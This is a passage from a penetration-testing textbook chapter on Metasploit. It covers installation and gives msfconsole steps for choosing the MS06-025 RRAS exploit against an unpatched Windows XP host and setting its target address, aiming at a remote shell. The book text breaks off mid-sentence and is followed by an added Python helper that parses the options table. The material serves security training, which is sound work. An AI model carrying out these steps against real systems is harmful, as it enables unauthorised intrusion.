Penetration Testing

Penetration Testing and Tools

Chapter 4 Using Metasploit



This chapter will show you how to use Metasploit, an exploit launching and development
platform.
• Metasploit: the big picture
• Getting Metasploit
• Using the Metasploit console to launch exploits
• Using Metasploit to exploit client-side vulnerabilities
• Using the Metasploit Meterpreter
• Using Metasploit as a man-in-the-middle password stealer
• Using Metasploit to auto-attack
• Inside Metasploit exploit modules

Metasploit: The Big Picture
Metasploit is a free, downloadable tool that makes it very easy to acquire, develop, and
launch exploits for computer software vulnerabilities. It ships with professional-grade
exploits for hundreds of known software vulnerabilities. When H.D. Moore released
Metasploit in 2003, it permanently changed the computer security scene. Suddenly, anyone
could become a hacker and everyone had access to exploits for unpatched and
recently patched vulnerabilities. Software vendors could no longer drag their feet fixing
publicly disclosed vulnerabilities, because the Metasploit crew was hard at work developing
exploits that would be released for all Metasploit users.
Metasploit was originally designed as an exploit development platform, and we’ll use
it later in the book to show you how to develop exploits. However, it is probably more
often used today by security professionals and hobbyists as a “point, click, root” environment
to launch exploits included with the framework.
We’ll spend the majority of this chapter showing Metasploit examples. To save space,
we’ll strategically snip out nonessential text, so the output you see while following along
might not be identical to what you see in this book. Most of the chapter examples will be
from Metasploit running on the Windows platform inside the Cygwin environment.
Gray Hat Hacking: The Ethical Hacker’s Handbook

Getting Metasploit
Metasploit runs natively on Linux, BSD, Mac OS X, and Windows inside Cygwin. You
can enlist in the development source tree to get the very latest copy of the framework, or
just use the packaged installers from http://framework.metasploit.com/msf/download.
The Windows console application (msfconsole) that we will be using throughout this
chapter requires the Cygwin environment to run. The Windows package comes with an
AJAX browser-based interface (msfweb) which is okay for light usage, but you’ll eventually
want to install Cygwin to use the console in Windows. The Cygwin downloader is
www.cygwin.com/setup.exe. Be sure to install at least the following, in addition to the
base packages:
• Devel: readline, ruby, and subversion (required for msfupdate)
• Interpreters: ruby
• Libs: readline
• Net: openssl

References
Installing Metasploit on Windows http://metasploit.com/dev/trac/wiki/Metasploit3/InstallWindows
Installing Metasploit on Mac OS X http://metasploit.com/dev/trac/wiki/Metasploit3/InstallMacOSX
Installing Metasploit on Gentoo http://metasploit.com/dev/trac/wiki/Metasploit3/InstallGentoo
Installing Metasploit on Ubuntu http://metasploit.com/dev/trac/wiki/Metasploit3/InstallUbuntu
Installing Metasploit on Fedora http://metasploit.com/dev/trac/wiki/Metasploit3/InstallFedora
Using the Metasploit Console to Launch Exploits
Our first demo in the tour of Metasploit will be to exploit an unpatched XP Service Pack
1 machine missing the RRAS security update (MS06-025). We’ll try to get a remote command
shell running on that box using the RRAS exploit built into the Metasploit framework.
Metasploit can pair any Windows exploit with any Windows payload. So we can
choose to use the RRAS vulnerability to open a command shell, create an administrator,
start a remote VNC session, or to do a bunch of other stuff. Let’s get started.
$ ./msfconsole
=[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf >

The interesting commands to start with are
• show
• info
• use
Other commands can be found by typing help. Our first task will be to find the name
of the RRAS exploit so we can use it:

msf > show exploits

Exploits
========

Name                               Description
----                               -----------
...
windows/smb/ms04_011_lsass         Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde        Microsoft NetDDE Service Overflow
windows/smb/ms05_039_pnp           Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg   Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras          Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi        Microsoft Server Service NetpwPathCanonicalize Overflow

There it is! Metasploit calls it windows/smb/ms06_025_rras. We’ll use that exploit
and then go looking for all the options needed to make the exploit work.
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Notice that the prompt changes to enter “exploit mode” when you use an exploit
module. Any options or variables you set while configuring this exploit will be retained
so you don’t have to reset the options every time you run it. You can get back to the original
launch state at the main console by issuing the back command.
msf exploit(ms06_025_rras) > back
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Different exploits have different options. Let’s see what options need to be set to
make the RRAS exploit work.
msf exploit(ms06_025_rras) > show options

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  ROUTER           yes       The pipe name to use (ROUTER, SRVSVC)

This exploit requires a target address, the port number SMB (server message block)
uses to listen, and the name of the pipe exposing this functionality.
msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.168.1.220
As you can see, the syntax to set an option is
set
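As an added illustration (not code from the book or from the Metasploit project), the following Python snippet parses the column-aligned table that show options prints, flags every Required option that still has no Current Setting (RHOST in the RRAS example above), and applies a set NAME VALUE line the way the console echoes it. The sample table is constructed to mirror the RRAS module's options as printed in the chapter.

```python
import re
from typing import Dict, List

# Constructed sample of `show options` output for the RRAS module (RHOST blank).
SHOW_OPTIONS_OUTPUT = """\
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  ROUTER           yes       The pipe name to use (ROUTER, SRVSVC)
"""

def parse_show_options(text: str) -> List[Dict[str, str]]:
    """Parse msfconsole's `show options` table into dicts. Column starts come
    from the dashed underline row, so a blank cell (RHOST) stays blank."""
    lines = text.splitlines()
    dash_idx = next(i for i, l in enumerate(lines) if l.startswith("----"))
    header, dashes = lines[dash_idx - 1], lines[dash_idx]
    starts = [m.start() for m in re.finditer(r"-+", dashes)]
    bounds = list(zip(starts, starts[1:] + [None]))   # (start, next_start)
    names = [header[s:e].strip() for s, e in bounds]
    rows = []
    for line in lines[dash_idx + 1:]:
        if line.strip():
            rows.append({n: line[s:e].strip() for n, (s, e) in zip(names, bounds)})
    return rows

def missing_required(rows: List[Dict[str, str]]) -> List[str]:
    """Names of options marked Required=yes that have no Current Setting."""
    return [r["Name"] for r in rows
            if r["Required"] == "yes" and r["Current Setting"] == ""]

def apply_set(rows: List[Dict[str, str]], command: str) -> str:
    """Apply one console `set NAME VALUE` line and echo it as msfconsole does."""
    m = re.fullmatch(r"\s*set\s+(\S+)\s+(\S+)\s*", command)
    if not m:
        raise ValueError(f"not a set command: {command!r}")
    name, value = m.group(1), m.group(2)
    for r in rows:
        if r["Name"] == name:
            r["Current Setting"] = value
            return f"{name} => {value}"
    raise KeyError(f"unknown option {name}")

if __name__ == "__main__":
    opts = parse_show_options(SHOW_OPTIONS_OUTPUT)
    print(missing_required(opts))                       # ['RHOST']
    print(apply_set(opts, "set RHOST 192.168.1.220"))   # RHOST => 192.168.1.220
    print(missing_required(opts))                       # []
```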
